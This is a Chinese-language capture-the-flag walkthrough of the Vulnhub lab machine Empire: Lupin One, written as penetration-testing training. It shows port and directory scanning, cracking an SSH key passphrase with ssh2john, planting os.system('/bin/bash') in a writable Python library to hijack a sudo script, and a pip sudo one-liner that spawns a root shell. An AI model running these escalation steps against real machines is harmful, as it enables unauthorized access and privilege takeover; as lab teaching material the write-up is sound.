看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。


Difficulty:Medium

Vulnhub靶机下载:

官网下载: https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip


Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。

Vulnhub靶机漏洞详解:


①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

PS:其实打开得时候ip就给了 没给得情况下要扫


渗透机:kali IP :172.16.5.140 靶机IP :172.16.5.179

使用命令:nmap -sS -sV -T4 -n -p- 172.16.5.179



使用命令:nmap -p22,80 -sC -sV 172.16.5.179 #可以尝试脚本扫描



访问一下80端口有一张图片,看到80端口就是老样子进行扫描:dirb、dirsearch、whatweb、gobuster等 发现robots.txt文件



没有什么可以利用得信息,进行深度扫描使用wfuzz模糊探测一下

wfuzz -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://172.16.5.179/\~FUZZ  


8090cbfffced40f9b4e3acc06ad48639.png



038fc4a8947e418c85ee9424da6da5ec.png


8a6a6431c671491ab0ec45468dfbe087.png


可以得到一个账号名:icex64 然后需要私钥登入 而且它藏在了某个地方!
然后继续扫 找到/~secret/.mysecret.txt文件,可以得知这一串是Base58编码


在线Base58解码:http://www.hiencode.com/base58w.html

②:SSH私钥爆破登入:


这里知道了账号但是不知道密码可以使用ssh2john进行破解 提示使用fasttrack这个字典 得到密码为:P@55w0rd!

然后给个权限600 不然登不进去 chomd 600 key 然后尝试登入 登入成功!!


③:pip提权:

sudo -l 显示当前用户可以用 sudo 执行那些命令
在家目录下发现arsene用户可以免密执行heist.py文件


python3.9目录下找到webbrowser.py vi编辑webbrowser.py (有写入权限)添加os.system("/bin/bash") 保存退出


sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

2f38d98d73b94bbaa722f85da75ba156.png


现在拿到了arsene用户权限 sudo -l 再次查看可以执行sudo权限得命令 ,发现了pip 提权(第一次用不太会,学一下即可)

直接GTFOBins里面找:https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF


b6672e1ef3df421fab2037536b7fb192.png

377d373ceedf43ae973bd549a54ebf67.png

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:


这个靶机难度适中

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb等 查看F12源码信息‘

2.Base58编码 ssh2john工具得使用 爆破ssh密码的

3.SSH私钥登入得权限要给 600 不然会报错

4.pip提权使用(第一次用)


Emplre的两篇就完结啦!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
4月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
102 0
|
4月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
48 0
|
4月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
35 0
|
4月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
47 0
|
4月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
54 0
|
5月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
201 0
|
29天前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
22 0
|
29天前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
58 0
|
数据采集 存储 Linux
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
|
Web App开发 Java 测试技术
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码:   setoolkit   出现以下界面:       在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网址,这里我们以百度为例,因此输入https://www.baidu.com。
2240 0